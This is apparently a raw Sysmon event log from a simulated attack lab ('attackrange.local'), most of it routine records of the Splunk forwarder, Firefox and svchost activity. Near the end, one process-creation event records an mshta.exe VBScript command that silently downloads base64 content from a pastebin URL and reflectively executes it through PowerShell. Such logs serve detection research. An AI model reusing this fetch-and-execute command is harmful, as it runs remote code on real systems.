Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DEF72190F9F494F176A1AFA4DDF7653,SHA256=8B0B351608B69AF6CD733769C3171108E3EDBD47C5124E7B9E19995FE2E5A68B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108048Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:06.510{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51938-false10.0.1.12-8000- 23542300x8000000000000000108047Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:08.065{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D163D769154B1C19FC4673DD6B0186C4,SHA256=8683835EC02A6FECD0B9954EEE57F484E8F6F1D9ECF80EFC5C060E2D51FA441F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083667Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:09.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C32C91D0E619B153C9076A600B73664,SHA256=40BF548EF794581E34B420B34B8150669B4CE0B83C66DE08D58295A4BA9908ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108049Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:09.095{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14D3A72054746637CF3BAC9D7D3EED9C,SHA256=5010B4ADD4ABAE20AC98CC49A19B099BE6493E8E6AB4B0EBBCE255259C0D7EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083668Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:10.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE2E8A48A017050FB64A98234309C25C,SHA256=429EA7C70FDF923F35A462ABD9994AE4CB888D9D63227A62135A2F79C7BEEF52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108050Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:10.095{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89CACEF68AFC5E686EC13EF91B4DFD03,SHA256=0C0D0FD5436D95B201F0C5EAF82404462000B5B3C19C7519C82A79520773C6ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083670Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:09.770{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50185-false10.0.1.12-8000- 23542300x800000000000000083669Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:11.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA391FD6AFDDDE4DE774A91DF760D31,SHA256=364A4B34A0732060277755B8D660F8D6B92B906FD8331556ED280CE395B1A4D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108058Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.663{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=AC18297DB506613CB5A07D7406DF3041,SHA256=2FF334F84FB27C27E08F5CAF43B9D494F724C7B00B806FBA9CC04CF8D17CA08F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108057Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.663{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=555FC3C0526AE8C6329926B08B3F99FE,SHA256=5D911BE3B4C7A9453AA3C6F228D63DBAE2B10DBB33581D6D22B62E87E8B4FB0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108056Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.663{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=138F7F2A82417B12BD6E67CF4B923258,SHA256=7777873F6E25A5DF312AC9490FB6E3BBD0CF9874A975A7FC9C57189626CEBEB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108055Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.663{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=873A5CD177C80CA9AE361E6082FC0039,SHA256=C86B6C92811B7FE8E6B1A48C9327B9EE82ED4F18536A7394EB9119DB64524972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108054Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.663{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=6794CC69E75671AD47FAE3EC1CDB2393,SHA256=6C6C7264FEAC0E5F2CF661F2DBD015E4AC28BB5E62EF2D25BD820C24395BBA4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108053Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.663{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=F08907D5A533894979F09B0EB66B7F31,SHA256=D384EF18062EA65CBFF47D48CAA30EACF28ADDA6022047DC3A96DB1FCFD784E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108052Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.478{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108051Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:11.126{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83D476BD0F465444001CF3DEDBC63E04,SHA256=0835380D1D92794539C10F3891CAF08629275921B00609341FBCBCAE4AA239FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083671Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:12.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24AC0C0C9672C754F11452FBD14B812D,SHA256=97CD6CC7C13C9CC4E527910BBEFA2C5875FFD65568CB5B4308839F03D36C49E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108059Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:12.147{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6954972D78C62A0C6974893560218FD,SHA256=5134CC265B76BD0D4A9C44BFF129D96DBDAB6E5919243F61A11B5D4F5C0C9B1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083672Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:13.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=635A59B7F3A66F4E092DF3DA25DCABA5,SHA256=FB4BB36541A14FDC036BDDA6531C373CDC2A99B6D5427C883146FCF0E383CBEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108094Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.978{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108093Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.978{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108092Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.978{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108091Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.978{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108090Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.978{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108089Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.947{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108088Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.947{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108087Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.947{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108086Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.941{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108085Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.926{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108084Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.926{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108083Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.913{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108082Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.894{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108081Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.894{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108080Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.894{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108079Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.894{58E9C193-AE62-615A-B200-00000000FC01}32124480C:\Windows\system32\csrss.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108078Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.894{58E9C193-B538-615A-7202-00000000FC01}72724540C:\Windows\System32\cmd.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108077Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.905{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B538-615A-7202-00000000FC01}7272C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000108076Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.878{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 